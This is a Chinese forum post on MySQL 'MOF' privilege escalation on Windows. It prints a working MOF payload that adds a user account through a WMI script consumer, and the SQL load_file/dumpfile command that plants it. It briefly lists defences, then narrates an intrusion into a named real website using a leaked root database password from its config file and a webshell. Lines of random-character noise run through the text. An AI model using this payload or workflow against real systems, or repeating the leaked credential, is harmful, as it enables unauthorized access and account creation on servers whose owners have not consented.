Mysql mof扩展漏洞实例与防范

admin

Mysql mof扩展漏洞防范方法
  D' |) g- y6 Q! l) S! ~
网上公开的一些利用代码:

#pragma namespace(“\\\\.\\root\\subscription”)
) O# k( \& [' P2 T( Y; m9 {
3 f* c; C; f6 q3 hinstance of __EventFilter as $EventFilter   {   EventNamespace = “Root\\Cimv2″;   Name  = “filtP2″;   Query = “Select * From __InstanceModificationEvent ”   “Where TargetInstance Isa \”Win32_LocalTime\” ”   “And TargetInstance.Second = 5″;   QueryLanguage = “WQL”;   };   instance of ActiveScriptEventConsumer as $Consumer   {   Name = “consPCSV2″;   ScriptingEngine = “JScript”;   ScriptText =   “var WSH = new ActiveXObject(\”WScript.Shell\”)\nWSH.run(\”net.exe user admin admin /add\”)”;   };   instance of __FilterToConsumerBinding   {   Consumer   = $Consumer;   Filter = $EventFilter;   };
2 |! d5 p7 s4 Q: q3 Z  z% W& N
  K5 t8 {3 N; f# b
6 n( ~2 t0 d: g( l9 p

% L, ~8 h; ~3 T  @4 m2 r
连接mysql数据库后执行： select load_file(‘C:\\RECYCLER\\nullevt.mof’) into dumpfile ‘c:/windows/system32/wbem/mof/nullevt.mof’;
从上面代码来看得出解决办法：

1、mysql用户权限控制，禁止 “load_file”、”dumpfile”等函数

2、禁止使用”WScript.Shel”组件
) @: U' z( F, Z: W0 t' T' \1 T
0 `& Q( z$ }# R8 x# n) D3、目录权限c:/windows/system32/wbem/mof/ 删除内置特殊组CREATOR OWNER
/ C# a7 R, [( I/ b8 T7 L* L6 |1 C
- ^3 i" \2 w! u" S3 R* b* |当然上面是网上说的 感觉需要的权限很大 比如 root 还有mysql外链昨天碰到了就给大家演示下

8 i5 V3 o$ p  }事情是这样发生的  一机油在论坛提问我就看了下 发现已经有大牛搞下了 说是用是 mysql mof扩展提权
, x- o+ R( w( r0 q& `, ]
3 ?2 _: D' P; T% w; _! h7 m* U2 u8 g但是小菜发现没有听过于是赶紧去查资料学习…就有了上面的来着网上的内容
1 X. v; x; d3 a: s3 X) M
2 B7 g. O9 c( T8 R1 y" E3 o: \看懂了后就开始练手吧
5 p% ?% h1 z2 Y, f7 S0 O6 O
# i1 O6 c& T4 o9 z" q" ^http://www.webbmw.com/config/config_ucenter.php 一句话 a
% H. ^2 N) A) ]0 d( @+ |
7 e! k& t0 A8 [2 H+ @$_config['db']['1']['dbhost'] = ‘localhost’; $_config['db']['1']['dbuser'] = ‘root’; $_config['db']['1']['dbpw'] = ‘tfr226206′; $_config['db']['1']['dbcharset'] = ‘gbk’; $_config['db']['1']['pconnect'] = ’0′; $_config['db']['1']['dbname'] = ‘webbmw’; $_config['db']['1']['tablepre'] = ‘pre_’; $_config['db']['common']['slave_except_table'] = ”; 有root密码啊。

于是直接用菜刀开搞
" q  [$ y- q# w3 y) Y0 J4 X
上马先

. ^6 _& _* ?5 [% l既然有了那些账号 之类的 于是我们就执行吧…….
, U! Z4 i5 n3 x7 r6 @0 a- ^- x2 d! u
小小的说下

在这里第1次执行未成功        原因未知

我就猜想是否是因为我们执行的代码有问题 于是我就去我wooyun找的代码。

$ n8 {7 M) ~/ N- O3 b* q4 E7 V#pragma namespace(“\\\\.\\root\\subscription”)

instance of __EventFilter as $EventFilter   {   EventNamespace = “Root\\Cimv2″;   Name  = “filtP2″;   Query = “Select * From __InstanceModificationEvent ”   “Where TargetInstance Isa \”Win32_LocalTime\” ”   “And TargetInstance.Second = 5″;   QueryLanguage = “WQL”;   };   instance of ActiveScriptEventConsumer as $Consumer   {   Name = “consPCSV2″;   ScriptingEngine = “JScript”;   ScriptText =   “var WSH = new ActiveXObject(\”WScript.Shell\”)\nWSH.run(\”net.exe user test test /add\”)”;   };   instance of __FilterToConsumerBinding   {   Consumer   = $Consumer;   Filter = $EventFilter;   };

4 A( a' ~9 Y. H: N& m& o# Q4 z% d我是将文件放到C:\WINDOWS\temp\1.mof
$ p9 Y- W- S8 w  o6 f( E- P
. I' M3 T' z6 r  X& w6 u所以我们就改下执行的代码

$ D9 ^( V% |) c; E3 e7 U; i# Oselect load_file(‘C:\WINDOWS\temp\1.mof‘) into dumpfile ‘c:/windows/system32/wbem/mof/nullevt.mof’;



+ x  l4 Z; L7 m/ L5 }' P5 ]但是 你会发现账号还是没有躺在那里。。
7 v  L$ p1 j  `. ~8 p0 N7 [1 l
0 E* q5 Y7 S9 \$ ~" w于是我就感觉蛋疼

就去一个一个去执行 但是执行到第2个 mysql时就成功了………
* W& `2 J% a8 l

9 n! V$ X/ a; K# |7 `9 [6 w
但是其他库均不成功…
$ f+ d3 y6 ^: i' ~+ V; E- L
我就很费解呀 到底为什么不成功求大牛解答…
! H5 a4 y3 E3 A% i  x9 h3 n9 {
​